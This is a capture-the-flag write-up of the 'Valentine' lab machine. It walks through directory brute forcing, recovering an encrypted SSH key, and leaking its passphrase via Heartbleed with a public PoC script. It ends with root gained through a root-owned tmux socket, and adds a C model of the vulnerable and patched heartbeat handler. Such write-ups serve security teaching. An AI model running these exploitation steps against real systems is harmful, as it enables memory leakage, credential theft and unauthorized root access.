Valentine

Abusing the OpenSSL Heartbleed vulnerability - SSH troubleshooting - PrivEsc via a root-owned tmux socket

Scanning

HTTP Enumeration

Viewing the page source and robots.txt didn't give me anything, so on to directory brute forcing:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

/dev holds two interesting files. The /encode and /decode endpoints are just base64 scripts run by the backend - I tried command injection there, but nothing worked :(

The hype_key file is a hex-encoded string.

Converting it back to text (an online tool works; so does xxd -r -p locally) reveals a PEM-encoded RSA private key!

Save it, restrict the permissions (ssh refuses keys that are readable by others) and try logging in via ssh - the key is passphrase-protected:

chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
Enter passphrase for key 'hype_key':

So now we need the passphrase. Extract a crackable hash from the key with the ssh2john utility and hand it to john:

ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .

Nothing useful - john couldn't crack it with rockyou - BACK TO ENUMERATION :(

nmap --script vuln -oA vuln-scan 10.10.10.79

The ssl-heartbleed NSE script reports port 443 as vulnerable to Heartbleed (CVE-2014-0160), a bug in the OpenSSL cryptographic library (versions 1.0.1 through 1.0.1f). The TLS heartbeat extension lets a peer send a payload together with a claimed payload length; the vulnerable code echoed back as many bytes as the header claimed without checking that the record actually contained them. Anyone on the Internet can therefore read up to 64 KiB of the server process's memory per request, without authentication and without leaving much of a trace. Secret keys, session cookies, passwords and whatever else the server handled recently can leak, and with the private key an attacker can also decrypt or eavesdrop on communications.
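How the over-read happens, shown as an added example that is not part of the original writeup or of OpenSSL: a stripped-down model of the heartbeat handler in C, with the pre-1.0.1g logic next to the patched check. The simulated process memory, the record layout and the stale passphrase left behind in memory are constructed for the demo; the field layout follows RFC 6520 (type byte, 16-bit big-endian payload length, payload, at least 16 bytes of padding).

```c
/*
 * Added example (not from the writeup or from OpenSSL): a model of the TLS
 * heartbeat handler that shows why the missing length check leaks memory
 * (CVE-2014-0160). process_mem, STALE_SECRET and the records are constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define MEM_SIZE 512

/* Simulated heap: the incoming heartbeat record is parsed in place at the
 * start, and data left over from earlier requests sits right after it. */
static unsigned char process_mem[MEM_SIZE];
static const char STALE_SECRET[] = "heartbleedbelievethehype";   /* constructed */

/* Write a heartbeat record into process_mem and return the record length the
 * TLS record layer really delivered. The attacker's claimed length goes into
 * the header but does NOT size the record. */
static size_t build_record(uint16_t claimed_len, const char *real_payload)
{
    size_t real_len = strlen(real_payload);
    memset(process_mem, 0, MEM_SIZE);
    process_mem[0] = TLS1_HB_REQUEST;
    process_mem[1] = (unsigned char)(claimed_len >> 8);
    process_mem[2] = (unsigned char)(claimed_len & 0xff);
    memcpy(process_mem + 3, real_payload, real_len);
    size_t rec_len = 1 + 2 + real_len + 16;            /* 16 bytes of padding */
    memcpy(process_mem + rec_len, STALE_SECRET, sizeof STALE_SECRET);
    return rec_len;
}

/* Pre-1.0.1g logic: trusts the payload length from the packet and copies that
 * many bytes from the record into the response. Returns the response length,
 * or -1 if the request is dropped. */
static int heartbeat_vulnerable(const unsigned char *rec, size_t rec_len,
                                unsigned char *out, size_t out_cap)
{
    const unsigned char *p = rec;
    unsigned char hbtype = *p++;
    unsigned int payload = ((unsigned int)p[0] << 8) | p[1];   /* attacker-chosen */
    p += 2;
    (void)rec_len;                     /* never compared against payload: the bug */
    if (hbtype != TLS1_HB_REQUEST)
        return -1;
    /* Guard rails for the model only, so it never reads outside process_mem or
     * overflows out; real OpenSSL had no bound other than the 16-bit field. */
    if ((size_t)(p - process_mem) + payload > MEM_SIZE || 3 + payload > out_cap)
        return -1;
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (unsigned char)(payload >> 8);
    out[2] = (unsigned char)(payload & 0xff);
    memcpy(out + 3, p, payload);       /* reads far past the real payload */
    return (int)(3 + payload);
}

/* 1.0.1g logic: the same handler with the bounds check that was added. */
static int heartbeat_fixed(const unsigned char *rec, size_t rec_len,
                           unsigned char *out, size_t out_cap)
{
    if (rec_len < 1 + 2 + 16)          /* too short even for an empty payload */
        return -1;
    unsigned char hbtype = rec[0];
    unsigned int payload = ((unsigned int)rec[1] << 8) | rec[2];
    if (1 + 2 + payload + 16 > rec_len)   /* the fix: claimed length vs. record */
        return -1;
    if (hbtype != TLS1_HB_REQUEST || 3 + payload > out_cap)
        return -1;
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (unsigned char)(payload >> 8);
    out[2] = (unsigned char)(payload & 0xff);
    memcpy(out + 3, rec + 3, payload);
    return (int)(3 + payload);
}

/* Does the byte range contain the NUL-terminated needle? */
static int contains(const unsigned char *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0)
            return 1;
    return 0;
}

/* Malicious request: 2-byte payload, header claims 200 bytes.
 * Returns 1 if the vulnerable handler echoes the stale secret back. */
int demo_vulnerable_leaks(void)
{
    unsigned char resp[MEM_SIZE];
    size_t rec_len = build_record(200, "hi");
    int n = heartbeat_vulnerable(process_mem, rec_len, resp, sizeof resp);
    return n > 0 && contains(resp, (size_t)n, STALE_SECRET);
}

/* Same request against the patched handler: it must be dropped (-1). */
int demo_fixed_rejects(void)
{
    unsigned char resp[MEM_SIZE];
    size_t rec_len = build_record(200, "hi");
    return heartbeat_fixed(process_mem, rec_len, resp, sizeof resp) == -1;
}

/* Honest request: claimed length matches the real payload, so it is answered. */
int demo_fixed_allows_honest(void)
{
    unsigned char resp[MEM_SIZE];
    size_t rec_len = build_record(2, "hi");
    int n = heartbeat_fixed(process_mem, rec_len, resp, sizeof resp);
    return n == 5 && memcmp(resp + 3, "hi", 2) == 0;
}

int main(void)
{
    printf("vulnerable handler leaks secret : %d\n", demo_vulnerable_leaks());
    printf("patched handler drops request   : %d\n", demo_fixed_rejects());
    printf("patched handler answers honest  : %d\n", demo_fixed_allows_honest());
    return 0;
}
```

The exploit script used below does the same thing over a real TLS connection: it completes a handshake, sends a heartbeat request whose header claims far more than it carries, and prints whatever the server copies back. Repeating the request is what turns up different slices of memory.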

To exploit this we can use this Python PoC script (heartbleed.py):

git clone https://gist.github.com/10174134.git

Let's run the exploit against port 443 with the request repeated 10 times (-n 10); every request dumps a different slice of memory, so the interesting data may not show up on the first try:

python heartbleed.py -p 443 -n 10 10.10.10.79

Among the leaked memory is a base64-encoded string; decoding it gives us the passphrase!

echo "aGVhcn.........." | base64 -d
heartbleedbelievethehype

We can now log on to the box using ssh with the key and passphrase - but on a current OpenSSH client this fails:

ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported

I spent some time on this error. The key is RSA and this old server only accepts signatures made with the ssh-rsa (RSA/SHA-1) algorithm, which OpenSSH clients have disabled by default since 8.8; re-enable it for this connection (newer releases call the option PubkeyAcceptedAlgorithms, but the old name still works as an alias):

ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation

Checked ~/.bash_history, which was readable and not symlinked to /dev/null; it records what the dev had been doing:

ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit

dev_sess is a Unix socket (the 's' in the ls -l type column), owned by root but accessible to hype. A SUID bit on a socket would be meaningless; what matters is that the tmux server listening on it was started by root and our user is allowed to connect. Attaching to it with the command from the history (tmux -S /.devs/dev_sess) drops us into root's session - we are root!
